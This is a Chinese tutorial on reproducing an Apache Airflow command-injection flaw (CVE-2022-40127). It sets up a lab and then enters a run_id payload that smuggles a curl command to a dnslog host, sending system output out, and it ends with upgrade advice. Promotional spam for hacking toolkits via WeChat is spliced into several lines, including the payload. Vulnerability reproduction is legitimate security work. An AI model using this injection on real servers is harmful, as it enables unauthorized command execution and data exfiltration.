简单的 Apache Airflow（CVE-2022-40127）漏洞复现

漏洞描述:

Apache Airflow 是一个可编程，调度和监控的工作流平台，基于有向无环图(DAG)，Airflow 可以定义一组有依赖的任务，按照依赖依次执行。该漏洞影响版本Apache Airflow <2.4.0；当攻击者可访问到 Apache Airflow 的后台，且环境中存在默认Example Dags，则可构造恶意请求借助 run_id 执行任意命令。

准备环境:

Ubuntu、apache airflow2.3.4、python3.8、mysql5.7.39网络安全全套教程+全套工具包+渗透书籍+技术文档加微信【anquan455】免费领取

一、环境搭建：

1、指定 air-flow 主目录：

export AIRFLOW_HOME=~/airflow

2、air-flow 安装

pip3 install apache-airflow==2.3.4

3、初始化

执行 airflow 进行初始化：

【一一帮助安全学习，所有资源获取处一一】

①网络安全学习路线

②20 份渗透测试电子书

③安全攻防 357 页笔记

④50 份安全攻防面试指南

⑤安全红队渗透工具包

⑥网络安全必备书籍

⑦100 个漏洞实战案例

⑧安全大厂内部视频资源

⑨历年 CTF 夺旗赛题解析

3、配置文件修改：

（1）初始化后，会在 airflow 主目录生成 airflow.cfg 文件：

编辑两个地方：

（A）

#executor = SequentialExecutor 修改为：executor = LocalExecutor

（B）

#sql_alchemy_conn = sqlite:////root/airflow/airflow.db 修改为：sql_alchemy_conn = mysql://airflowdb:airflowdb123@localhost:3306/airflowdb

（2）修改 mysql 配置文件 my.cnf，在[mysqld]中添加：

explicit_defaults_for_timestamp = true

我直接用的宝塔，在配置里面已经存在：

修改后重启 mysql

（3）添加一个名为 airflowdb 的数据库：

<注意：数据库引擎建议为 innodb，否则会报错“Specified key was too long; max key length is 1000 bytes”>

4、数据库初始化

在~/airflow 主目录执行：

airflow db init

<注：该处若未安装 mysqlclient，将会报错，

ModuleNotFoundError: No module named 'MySQLdb'

因为初始化会写入 mysql

mysqlclinet 安装：

python3 -m pip install mysqlclien

执行：

正常执行完毕后，会有“Initialization done”字样：

5、配置

创建登录用户：

airflow users create --username admin --firstname admin --lastname admin --role Admin --email admin@lab.com

最后將提示设置密码：

6、启动

（1）server

airflow webserver -p 11888

（2）scheduler：

airflow scheduler

界面：

二、复现：

登录 airflow：

设置 run_id

在“example_bash_operator”行，点击 action 项的三角符号，点击“Trigger DAG w/ config”：

进入配置，

在“run id”处输入 payload：

{"lab":"\";curl `uname`.****.dnslog.pw;\""}网络安全全套教程+全套工具包+渗透书籍+技术文档加微信【anquan455】免费领取

dnslog 处查看结果：

漏洞修复：

官方已发布版本 2.4.3，可升级 Apache Airflow 版本到 2.4.0 或以上，或者停用默认 Dags。